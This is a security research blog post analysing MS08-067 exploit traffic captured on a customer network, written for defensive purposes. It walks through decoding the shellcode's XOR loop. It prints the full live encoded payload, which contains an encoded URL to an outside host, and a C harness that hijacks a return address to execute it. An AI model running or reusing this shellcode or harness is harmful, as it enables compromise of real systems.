While sifting through my e-mail this morning, I saw a note from one of Sourcefire's European employees, asking if the VRT could take a look at some PCAPs pulled from a customer sensor - they'd triggered the rules for MS08-067, and our guy didn't think that they were false positives. Always eager to get real-world feedback on how our rules were functioning, I agreed; a cursory look at them convinced me that they were in need of more in-depth analysis by someone who knew the vulnerability better than I did, so I sent them over to Lurene Grenier and Matt Olney, who were the primary analysts on that vulnerability (and who, along with Alain Zidouemba, produced the VRT whitepaper on the subject http://www.snort.org/vrt/docs/white_papers/ms08-067wp.pdf).

After verifying that the PCAPs did in fact have all of the triggering conditions for the vulnerability, Lurene dumped out the RPC stub data for examination - since, if this was an exploit, that's where the payload would live. Examining the raw hex of the payload, she noticed what appeared to be a simple decoder routine, so she took the data and put it into IDA Pro to confirm her theory. For those wishing to follow along at home, the process is simple:

  • Select a new file for disassembly using "File -> New"
  • Choose "Unknown File" from the "Various Files" tab, and then select the dump file
  • Stick with IDA's default options, and choose 32-bit disassembly mode
  • Move your cursor to the start of the area you want to examine, and then press "C" to begin disassembly

With this done, Lurene's theory was immediately confirmed, as the first three lines of the disassembly were an XOR loop:

0040A005 xor byte ptr [ebx+0Eh], 85h
0040A009 inc ebx
0040A00A loop test+0xA005 (0040A005)

This simple XOR decoding routine is useful for defeating many automated malware-detection techniques, and at a cost of only seven bytes at the start of the shellcode, is a very practical technique that is commonly seen in live exploits in the wild.
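To make the decoder's effect concrete, here is a minimal C sketch of the same operation: every byte is XOR'd with the key 0x85, one byte per iteration. The function names (xor_decode, decode_excerpt) and the DEMO_MAIN switch are made up for illustration; the 26-byte excerpt is copied from the payload bytes listed later in this post. It is a stand-in for the three-instruction loop, not a reproduction of how the shellcode itself runs.

```c
#include <assert.h>
#include <stddef.h>
#include <stdio.h>
#include <string.h>

/* XOR every byte of buf with key, in place. This mirrors what the
 * xor / inc / loop sequence does, one byte per pass. */
static void xor_decode(unsigned char *buf, size_t len, unsigned char key)
{
    for (size_t i = 0; i < len; i++)
        buf[i] ^= key;
}

/* Decode a 26-byte excerpt of the captured payload and store the
 * NUL-terminated result in out, which must hold at least 27 bytes. */
static void decode_excerpt(char *out)
{
    unsigned char excerpt[] = {
        0xED, 0xF1, 0xF1, 0xF5, 0xBF, 0xAA, 0xAA, 0xB4, 0xB5, 0xAB,
        0xB7, 0xB5, 0xBC, 0xAB, 0xB0, 0xBC, 0xAB, 0xB0, 0xB7, 0xBF,
        0xBD, 0xB0, 0xB3, 0xB0, 0xAA, 0xFD
    };

    xor_decode(excerpt, sizeof excerpt, 0x85);
    memcpy(out, excerpt, sizeof excerpt);
    out[sizeof excerpt] = '\0';
}

#ifdef DEMO_MAIN /* build with -DDEMO_MAIN for a standalone program */
int main(void)
{
    char text[27];

    decode_excerpt(text);
    assert(strlen(text) == 26);
    puts(text); /* the excerpt becomes readable ASCII once decoded */
    return 0;
}
#endif
```

Because XOR is its own inverse, running xor_decode a second time with the same key restores the original bytes, which is why a one-byte key and a seven-byte stub are all an attacker needs.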

Before running that loop to determine what the decoded payload contained, one additional bit of setup was necessary: the EBX register had to be pointed at the data that was going to be XOR'd, since we didn't have the Windows Server Service populating it with the appropriate address for us. This was a fairly simple step - the value was just the address immediately after the LOOP instruction, minus the 0x0E displacement that the XOR instruction used. With that calculated, a simple

mov ebx,offset test+0x9FFE (00409FFE)

populated the register nicely. For those who might be wondering about ECX - since the LOOP instruction uses it to determine when to halt operation and continue on to the next instruction - it wasn't necessary to set it explicitly, since our test environment happened to populate it with a value large enough to decode the shellcode, and we really weren't interested in having those instructions executed on Lurene's system anyway.
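The EBX arithmetic is easy to check by hand, but a short C sketch makes the steps explicit. The function name decoder_base and its parameters are hypothetical; the inputs come from the disassembly above (the LOOP instruction sits at 0x0040A00A, is two bytes long, and the XOR uses a displacement of 0x0E).

```c
#include <assert.h>
#include <stdint.h>
#include <stdio.h>

/* Return the value EBX must hold so that [ebx + disp] addresses the
 * first encoded byte, i.e. the byte immediately after the LOOP
 * instruction. */
static uint32_t decoder_base(uint32_t loop_addr, uint32_t loop_len,
                             uint32_t disp)
{
    uint32_t first_encoded = loop_addr + loop_len; /* 0x0040A00C here */

    return first_encoded - disp;
}

#ifdef DEMO_MAIN /* build with -DDEMO_MAIN for a standalone program */
int main(void)
{
    uint32_t ebx = decoder_base(0x0040A00Au, 2u, 0x0Eu);

    assert(ebx == 0x00409FFEu);
    printf("mov ebx, 0x%08X\n", (unsigned)ebx);
    return 0;
}
#endif
```

The result, 0x00409FFE, matches the operand of the mov instruction shown above and the little-endian bytes fe 9f 40 00 at the very start of the shellcode array in the program below.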

Getting this to actually execute and do the decoding for us requires the following relatively simple C program:

char shellcode[] ="\xbb\xfe\x9f\x40\x00\x80\x73\x0E\x85\x43\xE2\xF9\x6C\x4E\x85\x85\x85\xDA\x6D\xD0""\x85\x85\x85\x0C\x46\xD5\xED\x0B\xCB\x8B\x69\x6D\xDA\x85\x85\x85\xB4\x4C\xE3\x3C""\xEA\xEB\xD4\xED\xF0\xF7\xE9\xE8\xD1\x7A\x55\xD5\xED\xB3\x9F\xAA\xF5\x6D\xC0\x85""\x85\x85\xB4\x4C\xD4\xD4\x08\xB2\xD3\x08\xF2\x89\xD3\xD4\x7A\x55\xD6\xED\x1D\x7B""\x0F\x8B\x6D\xA9\x85\x85\x85\xD4\xD2\x7A\x55\xD6\xED\x35\xCC\xA8\x5E\x6D\x98\x85""\x85\x85\xB4\x4C\xCC\xD4\x7A\x55\xD0\xD3\xE1\x24\xB5\x85\x85\x85\x0E\xC5\x89\x0E""\xF5\x99\x28\x0E\xED\x8D\x0C\x6D\xDB\xD8\x46\xD6\xD0\xD3\xD2\x0E\xE9\xA1\x9D\x0E""\xC0\xB9\x0E\xD1\x80\xFD\x84\x6F\x0E\xCF\x9D\x0E\xDF\xA5\x84\x6E\x66\xB0\xCC\x0E""\xB1\x0E\x84\x6B\xB4\x7A\x79\xB4\x45\x29\xBD\x65\xF1\x82\x44\x4A\x88\x84\x42\x6E""\x77\xBE\xF9\xA1\x91\xF0\x64\x0E\xDF\xA1\x84\x6E\xE3\x0E\x89\xCE\x0E\xDF\x99\x84""\x6E\x0E\x81\x0E\x84\x6D\x6C\x87\x85\x85\x85\xB4\x45\x0C\x6F\xDA\xDB\xD8\xDE\x46""\x6D\xB5\x7A\x7A\x7A\xFD\xAB\xE0\xFD\xE0\x85\x85\x85\x85\x85\x85\x85\xED\xF1\xF1""\xF5\xBF\xAA\xAA\xB4\xB5\xAB\xB7\xB5\xBC\xAB\xB0\xBC\xAB\xB0\xB7\xBF\xBD\xB0\xB3""\xB0\xAA\xFD\x85\x85\x85\x85\x85\x85\x85\x85\x85\x85\x85\x85\x85\x85\x85\x85\x85""\x85\x85\x85\x85\x85\x85\x85\x85\x85\x85\x85\x85\x85\x85\x85\x85\x85\x85\x85\x85""\x85\x85\x85\x85\x85\xDD\x6B\xFC\x3A\xFB\xBE\x5A\xC4\xDD\x6D\xFE\x68\xDD\x8C\x6B""\x47\xA9\xEC\x68\x14\xE6\xDF\x6B\x41\x70\x44\x44\xFF\xCD\x75\x74\xF7\x71\x44\x42""\x68\xF2\xBB\x94\x97\x5C\x00\x2E\x00\x2E\x00\x5C\x00\x2E\x00\x2E\x00\x5C\x00\x41""\x00\x4F\x00\x48\x00\x4C\x00\x4D\x00\x58\x00\x59\x00\x08\x04\x02\x00\x61\x13\x00""\x01\x50\x49\x54\x48\x61\x13\x00\x01\x49\x46\x4A\x55\x4F\x55\x54\x45\x50\x55\x57""\x4B\x58\x4D\x57\x58\x55\x47\x48\x4D\x49\x45\x4B\x43\x59\x45\x4E\x42\x41\x51\x50""\x4C\x5A\x45\x44\x4E\x4F\x4F\x42\x47\x4D\x57\xBA\xB3\x3D\x85\xD5\x1B\xF8\x4A\xEB""\x62\x4D\x5A\x43\x54\x57\x4C\x48\x59\x57\x49\x00\x00\x00\x00\x9A\x01\x00\x00\x02""\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00\x5C\x00\x00\x00\x01\x10\x00\x00\x00""\x00\x00\x00"
;

void main() {
        int *ret;

        _asm {
                int 3
        }

        ret = &ret+2;
        *ret = (int *) shellcode;
        return;
}

The shellcode portion above should be obvious, but the rest of the program is worth an overview. The simplest piece is the _asm statement, which tells the compiler that everything inside the braces is explicit assembly code, to be inserted directly into the program at that point of execution. Here, the instruction int 3 is a breakpoint, which is handy for running this program in your debugger of choice.

The rest of the program becomes obvious once you think about the nature of the program's stack. At the time the breakpoint is hit, the stack looks like this (addresses approximate):

-----------------------------------
| Return pointer to caller (libc) | 0x00800010
|---------------------------------|
|      Saved EBP from caller      | 0x0080000C
|---------------------------------|
|      local variable (*ret)      | 0x00800008
|---------------------------------|
|             ...                 | 0x00800004
-----------------------------------

Thus, the line

ret = &ret+2;

first takes the address of ret - 0x00800008, i.e. the location of the variable ret on the stack - and then adds 2 to that value. Since this is pointer arithmetic, and we're on a 32-bit platform, the compiler actually takes the size of the element being pointed to, which is 4 bytes, and multiplies that by 2 before doing the addition. This results in the value of ret being 0x00800010 - the location of the return pointer to libc. That allows the next line of the program:

*ret = (int *) shellcode;

to replace the return pointer with the address of the start of the shellcode (for anyone who's curious, as a global variable, char shellcode[] lives in the program's data section rather than on the stack drawn above). By doing this, when the program returns out of main, execution will jump to the instructions at the start of the shellcode block, and thus head directly into the decoder routine Lurene identified.
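The scaling step in that pointer arithmetic is the part that trips people up, so here is a small, portable C sketch of it. It does not touch a real return address; an ordinary array (frame, a made-up name) stands in for the stack slots in the diagram, and the helper slot_distance_in_bytes is hypothetical. On a 32-bit build, moving 2 slots covers 8 bytes, matching the jump from 0x00800008 to 0x00800010; on a 64-bit build the same code covers 16.

```c
#include <assert.h>
#include <stddef.h>
#include <stdio.h>

/* Return how many bytes a pointer to a pointer-sized slot moves when
 * `slots` is added to it. slots must be between 0 and 4. */
static size_t slot_distance_in_bytes(size_t slots)
{
    int *frame[4] = {0};        /* stand-in for four stack slots */
    int **base = &frame[0];     /* same type as &ret in the program */
    int **moved = base + slots; /* scaled by sizeof(int *) */

    return (size_t)((char *)moved - (char *)base);
}

#ifdef DEMO_MAIN /* build with -DDEMO_MAIN for a standalone program */
int main(void)
{
    size_t bytes = slot_distance_in_bytes(2);

    assert(bytes == 2 * sizeof(int *));
    printf("adding 2 moves the pointer %zu bytes\n", bytes);
    return 0;
}
#endif
```

This also explains why the trick depends on the compiler and platform: the exact distance between a local variable and the saved return pointer depends on the frame layout, which is why the addresses in the diagram are described as approximate.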

As you can see from the screenshots below, the decoder routine took what appeared to be a group of relatively random, harmless instructions:

and transformed them into a series of relative and register-based calls, one of the hallmarks of shellcode (such calls allow an attacker to call into code they control, instead of relying on fixed addresses within the operating system):

With this new knowledge in hand, I replied to my colleague who had sent over the PCAPs, and confirmed that these were indeed true positives, and malicious ones at that. My e-mail was apologetic, since I was the bearer of bad news - after all, who wants to tell someone they've been owned?

Much to my surprise, the e-mail I got in reply was extremely pleased. As it turns out, the customer - a large French manufacturing company - had seen an outbreak of this malicious traffic on their worldwide network that morning. However, the traffic was unable to penetrate inside of their core network in France, since they'd enabled the Sourcefire rules for MS08-067 in drop mode, and their IPS was busy blocking each and every attack attempt on that segment of their network - like a modern-day Maginot Line that actually worked.

The whole thing was quite gratifying, since we always like to hear that our rules work in the wild as well as they do here in the VRT lab. That in mind, we're always eager to hear how people are actually using the VRT rules in production situations - it helps us prioritize our response to the threat landscape - so if you've got a story you're willing to share about how you're using our stuff, drop us a line at research@sourcefire.com. Depending on the quality and number of stories we get, Snort swag may be distributed to those who send us the best stuff.